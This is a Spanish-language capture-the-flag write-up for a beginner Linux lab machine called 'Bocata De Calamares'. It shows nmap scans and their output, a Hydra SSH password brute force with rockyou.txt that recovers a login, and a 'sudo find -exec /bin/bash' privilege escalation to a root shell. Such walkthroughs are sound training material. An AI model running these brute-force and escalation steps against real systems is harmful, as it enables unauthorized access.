Bocata De Calamares
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Linux | Principiante | 11 Enero 2025 | Condor & Curiosidades de Hackers |
Enumeración inicial
Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 192.168.1.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-11 12:04 -03
Initiating ARP Ping Scan at 12:04
Scanning 192.168.1.16 [1 port]
Completed ARP Ping Scan at 12:04, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:04
Scanning 192.168.1.16 [65535 ports]
Discovered open port 22/tcp on 192.168.1.16
Discovered open port 80/tcp on 192.168.1.16
Completed SYN Stealth Scan at 12:04, 28.47s elapsed (65535 total ports)
Nmap scan report for 192.168.1.16
Host is up, received arp-response (0.00052s latency).
Scanned at 2025-01-11 12:04:18 -03 for 29s
Not shown: 52184 filtered tcp ports (no-response), 13349 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:CB:9C:C6 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 28.66 seconds
Raw packets sent: 123961 (5.454MB) | Rcvd: 13353 (534.120KB)
Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.
nmap -sCV -p22,80 -oN servicesScan -vvv 192.168.1.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-11 12:05 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Initiating ARP Ping Scan at 12:05
Scanning 192.168.1.16 [1 port]
Completed ARP Ping Scan at 12:05, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:05
Scanning offensive.thl (192.168.1.16) [2 ports]
Discovered open port 80/tcp on 192.168.1.16
Discovered open port 22/tcp on 192.168.1.16
Completed SYN Stealth Scan at 12:05, 0.03s elapsed (2 total ports)
Initiating Service scan at 12:05
Scanning 2 services on offensive.thl (192.168.1.16)
Completed Service scan at 12:05, 6.04s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.16.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.12s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Nmap scan report for offensive.thl (192.168.1.16)
Host is up, received arp-response (0.0025s latency).
Scanned at 2025-01-11 12:05:17 -03 for 6s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a6:3f:47:73:4c:6d:b3:23:29:fa:f8:1f:1d:42:44:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHyBvfo5SYGuNpOOumyFtmqq3W0DAUeq11YcE3QOqG5PR56zOIfdlE7/KL2JYKtG14FedZKpJWLS9sJaOHoGKFE=
| 256 11:b8:dc:df:a9:c1:9f:b5:8f:55:93:a4:ef:65:c8:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDJR2ahgUu1wLCXtWmCD0KmRU8y5VsaG0OSnc5kMuxr9
80/tcp open http syn-ack ttl 64 nginx 1.24.0 (Ubuntu)
|_http-title: AFN
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: BF6231C430E40B86700ED83F2F2747B0
|_http-server-header: nginx/1.24.0 (Ubuntu)
MAC Address: 08:00:27:CB:9C:C6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.80 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
Explotación inicial
echo 'lee_archivos' | base64
bGVlX2FyY2hpdm9zCg==
users.txt
tyuiop:superadministrator
hydra -L users.txt -P rockyou.txt ssh://192.168.1.16 -I -V
superadministrator:princesa
Elevación de privilegios
sudo find . -exec /bin/bash \; -quit
Post Explotación
